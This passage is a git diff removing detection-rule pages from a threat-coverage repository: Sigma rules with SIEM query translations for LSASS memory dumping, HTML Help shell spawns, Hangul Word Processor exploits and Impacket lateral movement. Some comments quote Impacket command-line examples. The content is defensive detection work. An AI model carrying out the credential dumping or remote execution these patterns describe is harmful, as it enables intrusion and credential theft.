-| **References**           | <ul><li>[https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass](https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: CreateMiniDump Hacktool
-id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d
-description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
-author: Florian Roth
-references:
-    - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
-date: 2019/12/22
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.001
-falsepositives:
-    - Unknown
-level: high
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1: 
-        Image|contains: '\CreateMiniDump.exe'
-    selection2:
-        Imphash: '4a07f944a83e8a7c2525efa35dd30e2f'
-    condition: 1 of them
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 11
-        TargetFilename|contains: '*\lsass.dmp'
-    condition: 1 of them
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "Image.*.*\\CreateMiniDump.exe.*" -or $_.message -match "Imphash.*4a07f944a83e8a7c2525efa35dd30e2f")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "11" -and $_.message -match "TargetFilename.*.*\\lsass.dmp.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\CreateMiniDump.exe* OR winlog.event_data.Imphash:("4A07F944A83E8A7C2525EFA35DD30E2F" OR "4a07f944a83e8a7c2525efa35dd30e2f"))
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"11" AND winlog.event_data.TargetFilename.keyword:*\\lsass.dmp*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/36d88494-1d43-4dc0-b3fa-35c8fea0ca9d <<EOF
-{
-  "metadata": {
-    "title": "CreateMiniDump Hacktool",
-    "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\CreateMiniDump.exe* OR winlog.event_data.Imphash:(\"4A07F944A83E8A7C2525EFA35DD30E2F\" OR \"4a07f944a83e8a7c2525efa35dd30e2f\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\CreateMiniDump.exe* OR winlog.event_data.Imphash:(\"4A07F944A83E8A7C2525EFA35DD30E2F\" OR \"4a07f944a83e8a7c2525efa35dd30e2f\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CreateMiniDump Hacktool'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/36d88494-1d43-4dc0-b3fa-35c8fea0ca9d-2 <<EOF
-{
-  "metadata": {
-    "title": "CreateMiniDump Hacktool",
-    "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.001"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:*\\\\lsass.dmp*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:*\\\\lsass.dmp*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CreateMiniDump Hacktool'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\CreateMiniDump.exe* OR Imphash:("4A07F944A83E8A7C2525EFA35DD30E2F" "4a07f944a83e8a7c2525efa35dd30e2f"))
-(EventID:"11" AND TargetFilename.keyword:*\\lsass.dmp*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\CreateMiniDump.exe*" OR Imphash="4a07f944a83e8a7c2525efa35dd30e2f")
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="11" TargetFilename="*\\lsass.dmp*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\CreateMiniDump.exe*" OR Imphash="4a07f944a83e8a7c2525efa35dd30e2f"))
-(event_id="11" TargetFilename="*\\lsass.dmp*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.*\CreateMiniDump\.exe.*|.*4a07f944a83e8a7c2525efa35dd30e2f))'
-grep -P '^(?:.*(?=.*11)(?=.*.*\lsass\.dmp.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_html_help_spawn.md b/Atomic_Threat_Coverage/Detection_Rules/win_html_help_spawn.md
deleted file mode 100644
index 6e924b3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_html_help_spawn.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | HTML Help Shell Spawn       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1223: Compiled HTML File](https://attack.mitre.org/techniques/T1223)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/)</li></ul>  |
-| **Author**               | Maxim Pavlunin |
-| Other Tags           | <ul><li>attack.t1218.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: HTML Help Shell Spawn
-id: 52cad028-0ff0-4854-8f67-d25dfcbc78b4
-status: experimental
-description: Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
-references:
-    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
-author: Maxim Pavlunin
-date: 2020/04/01
-modified: 2020/04/03
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1223
-    - attack.t1218.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: 'C:\Windows\hh.exe'
-        Image|endswith:
-            - '\cmd.exe'
-            - '\powershell.exe'
-            - '\wscript.exe'
-            - '\cscript.exe'
-            - '\regsvr32.exe'
-            - '\wmic.exe'
-            - '\rundll32.exe'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*C:\\Windows\\hh.exe" -and ($_.message -match "Image.*.*\\cmd.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\cscript.exe" -or $_.message -match "Image.*.*\\regsvr32.exe" -or $_.message -match "Image.*.*\\wmic.exe" -or $_.message -match "Image.*.*\\rundll32.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage:"C\:\\Windows\\hh.exe" AND winlog.event_data.Image.keyword:(*\\cmd.exe OR *\\powershell.exe OR *\\wscript.exe OR *\\cscript.exe OR *\\regsvr32.exe OR *\\wmic.exe OR *\\rundll32.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/52cad028-0ff0-4854-8f67-d25dfcbc78b4 <<EOF
-{
-  "metadata": {
-    "title": "HTML Help Shell Spawn",
-    "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1223",
-      "attack.t1218.001"
-    ],
-    "query": "(winlog.event_data.ParentImage:\"C\\:\\\\Windows\\\\hh.exe\" AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\rundll32.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage:\"C\\:\\\\Windows\\\\hh.exe\" AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\rundll32.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'HTML Help Shell Spawn'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage:"C\:\\Windows\\hh.exe" AND Image.keyword:(*\\cmd.exe *\\powershell.exe *\\wscript.exe *\\cscript.exe *\\regsvr32.exe *\\wmic.exe *\\rundll32.exe))
-```
-
-
-### splunk
-    
-```
-(ParentImage="C:\\Windows\\hh.exe" (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\regsvr32.exe" OR Image="*\\wmic.exe" OR Image="*\\rundll32.exe")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="C:\\Windows\\hh.exe" Image IN ["*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe", "*\\regsvr32.exe", "*\\wmic.exe", "*\\rundll32.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*C:\Windows\hh\.exe)(?=.*(?:.*.*\cmd\.exe|.*.*\powershell\.exe|.*.*\wscript\.exe|.*.*\cscript\.exe|.*.*\regsvr32\.exe|.*.*\wmic\.exe|.*.*\rundll32\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_hwp_exploits.md b/Atomic_Threat_Coverage/Detection_Rules/win_hwp_exploits.md
deleted file mode 100644
index e742094..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_hwp_exploits.md
+++ /dev/null
@@ -1,189 +0,0 @@
-| Title                    | Suspicious HWP Sub Processes       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1202: Indirect Command Execution](https://attack.mitre.org/techniques/T1202)</li><li>[T1193: Spearphishing Attachment](https://attack.mitre.org/techniques/T1193)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1202: Indirect Command Execution](../Triggers/T1202.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/](https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/)</li><li>[https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1](https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1)</li><li>[https://twitter.com/cyberwar_15/status/1187287262054076416](https://twitter.com/cyberwar_15/status/1187287262054076416)</li><li>[https://blog.alyac.co.kr/1901](https://blog.alyac.co.kr/1901)</li><li>[https://en.wikipedia.org/wiki/Hangul_(word_processor)](https://en.wikipedia.org/wiki/Hangul_(word_processor))</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0032</li><li>attack.t1566.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious HWP Sub Processes
-id: 023394c4-29d5-46ab-92b8-6a534c6f447b
-description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-status: experimental
-references:
-    - https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/
-    - https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1
-    - https://twitter.com/cyberwar_15/status/1187287262054076416
-    - https://blog.alyac.co.kr/1901
-    - https://en.wikipedia.org/wiki/Hangul_(word_processor)
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.initial_access
-    - attack.t1059
-    - attack.t1202
-    - attack.t1193
-    - attack.g0032
-    - attack.t1566.001
-author: Florian Roth
-date: 2019/10/24
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\Hwp.exe'
-        Image: '*\gbb.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\Hwp.exe" -and $_.message -match "Image.*.*\\gbb.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\Hwp.exe AND winlog.event_data.Image.keyword:*\\gbb.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/023394c4-29d5-46ab-92b8-6a534c6f447b <<EOF
-{
-  "metadata": {
-    "title": "Suspicious HWP Sub Processes",
-    "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.initial_access",
-      "attack.t1059",
-      "attack.t1202",
-      "attack.t1193",
-      "attack.g0032",
-      "attack.t1566.001"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\Hwp.exe AND winlog.event_data.Image.keyword:*\\\\gbb.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\Hwp.exe AND winlog.event_data.Image.keyword:*\\\\gbb.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious HWP Sub Processes'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\Hwp.exe AND Image.keyword:*\\gbb.exe)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\Hwp.exe" Image="*\\gbb.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\Hwp.exe" Image="*\\gbb.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\Hwp\.exe)(?=.*.*\gbb\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_impacket_lateralization.md b/Atomic_Threat_Coverage/Detection_Rules/win_impacket_lateralization.md
deleted file mode 100644
index 578027f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_impacket_lateralization.md
+++ /dev/null
@@ -1,212 +0,0 @@
-| Title                    | Impacket Lateralization Detection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li><li>[T1175: Component Object Model and Distributed COM](https://attack.mitre.org/techniques/T1175)</li><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>pentesters</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py)</li><li>[https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py)</li><li>[https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py)</li><li>[https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py)</li></ul>  |
-| **Author**               | Ecco |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Impacket Lateralization Detection
-id: 10c14723-61c7-4c75-92ca-9af245723ad2
-status: experimental
-description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-references:
-    - https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py
-    - https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py
-    - https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py
-    - https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py
-author: Ecco
-date: 2019/09/03
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_other:
-        # *** wmiexec.py 
-        #    parent is wmiprvse.exe
-        #    examples:
-        #       cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
-        #       cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
-        # *** dcomexec.py -object MMC20 
-        #   parent is mmc.exe
-        #   example:
-        #       "C:\Windows\System32\cmd.exe" /Q /c cd  1> \\127.0.0.1\ADMIN$\__1567442499.05 2>&1
-        # *** dcomexec.py -object ShellBrowserWindow
-        #  runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe
-        #  example:
-        #   "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1567520103.71 2>&1
-        # *** smbexec.py
-        #   parent is services.exe
-        #   example:
-        #       C:\Windows\system32\cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat
-        ParentImage:
-            - '*\wmiprvse.exe'  # wmiexec
-            - '*\mmc.exe'  # dcomexec MMC
-            - '*\explorer.exe'  # dcomexec ShellBrowserWindow
-            - '*\services.exe'  # smbexec
-        CommandLine:
-            - '*cmd.exe* /Q /c * \\\\127.0.0.1\\*&1*'
-    selection_atexec:
-        ParentCommandLine:
-            - '*svchost.exe -k netsvcs' # atexec on win10 (parent is "C:\Windows\system32\svchost.exe -k netsvcs")
-            - 'taskeng.exe*' # atexec on win7 (parent is "taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\System:Service:")
-        # cmd.exe /C tasklist /m > C:\Windows\Temp\bAJrYQtL.tmp 2>&1
-        CommandLine:
-            - 'cmd.exe /C *Windows\\Temp\\*&1'
-    condition: (1 of selection_*)
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.lateral_movement
-    - attack.t1047
-    - attack.t1175
-    - attack.t1021
-falsepositives:
-    - pentesters
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1") -and ((($_.message -match "ParentImage.*.*\\wmiprvse.exe" -or $_.message -match "ParentImage.*.*\\mmc.exe" -or $_.message -match "ParentImage.*.*\\explorer.exe" -or $_.message -match "ParentImage.*.*\\services.exe") -and ($_.message -match "CommandLine.*.*cmd.exe.* /Q /c .* \\\\127.0.0.1\\.*&1.*")) -or (($_.message -match "ParentCommandLine.*.*svchost.exe -k netsvcs" -or $_.message -match "ParentCommandLine.*taskeng.exe.*") -and ($_.message -match "CommandLine.*cmd.exe /C .*Windows\\Temp\\.*&1")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:(*\\wmiprvse.exe OR *\\mmc.exe OR *\\explorer.exe OR *\\services.exe) AND winlog.event_data.CommandLine.keyword:(*cmd.exe*\ \/Q\ \/c\ *\ \\\\127.0.0.1\\*&1*)) OR (winlog.event_data.ParentCommandLine.keyword:(*svchost.exe\ \-k\ netsvcs OR taskeng.exe*) AND winlog.event_data.CommandLine.keyword:(cmd.exe\ \/C\ *Windows\\Temp\\*&1)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/10c14723-61c7-4c75-92ca-9af245723ad2 <<EOF
-{
-  "metadata": {
-    "title": "Impacket Lateralization Detection",
-    "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1047",
-      "attack.t1175",
-      "attack.t1021"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\wmiprvse.exe OR *\\\\mmc.exe OR *\\\\explorer.exe OR *\\\\services.exe) AND winlog.event_data.CommandLine.keyword:(*cmd.exe*\\ \\/Q\\ \\/c\\ *\\ \\\\\\\\127.0.0.1\\\\*&1*)) OR (winlog.event_data.ParentCommandLine.keyword:(*svchost.exe\\ \\-k\\ netsvcs OR taskeng.exe*) AND winlog.event_data.CommandLine.keyword:(cmd.exe\\ \\/C\\ *Windows\\\\Temp\\\\*&1)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\wmiprvse.exe OR *\\\\mmc.exe OR *\\\\explorer.exe OR *\\\\services.exe) AND winlog.event_data.CommandLine.keyword:(*cmd.exe*\\ \\/Q\\ \\/c\\ *\\ \\\\\\\\127.0.0.1\\\\*&1*)) OR (winlog.event_data.ParentCommandLine.keyword:(*svchost.exe\\ \\-k\\ netsvcs OR taskeng.exe*) AND winlog.event_data.CommandLine.keyword:(cmd.exe\\ \\/C\\ *Windows\\\\Temp\\\\*&1)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Impacket Lateralization Detection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
